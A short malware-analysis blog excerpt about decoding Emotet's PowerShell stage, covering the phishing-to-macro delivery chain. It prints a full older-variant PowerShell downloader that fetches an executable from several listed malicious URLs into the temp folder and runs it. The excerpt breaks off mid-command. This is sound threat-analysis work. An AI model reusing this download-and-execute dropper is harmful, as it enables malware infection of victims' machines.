Spetember 2017, Decoding the latest Emotet Powershell
As many have already noticed, over the last month Emotet has hit hard again. The deliveries are similar to before, an emial phish with a link, the link downloads a malicious document. The document, usually a malicious word document, uses VBA to build and execute a powershell command which then will download the next stage of infection. This used to be very simple to see, for example, older observed variants produced the following powershell: powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$random = new-object random;$urls = 'hxxp://rghuston[.]com/gxrdcca/,http://lepolat[.]net/jk/,hxxp://mpny[.]tv/bjnmxh/,hxxp://cfclife[.]org/cfcwp/ulrpcpgx/,hxxp://rghuston[.]com/gxrdcca/'.Split(',');$name = $random.next(1, 65536);$path = $env:temp + '\' + $name + '.exe';foreach($url in $urls){try{$webclient.DownloadFile($url.ToString(), $path);Start-Process $path;break;}catch{write-host $_.Ex...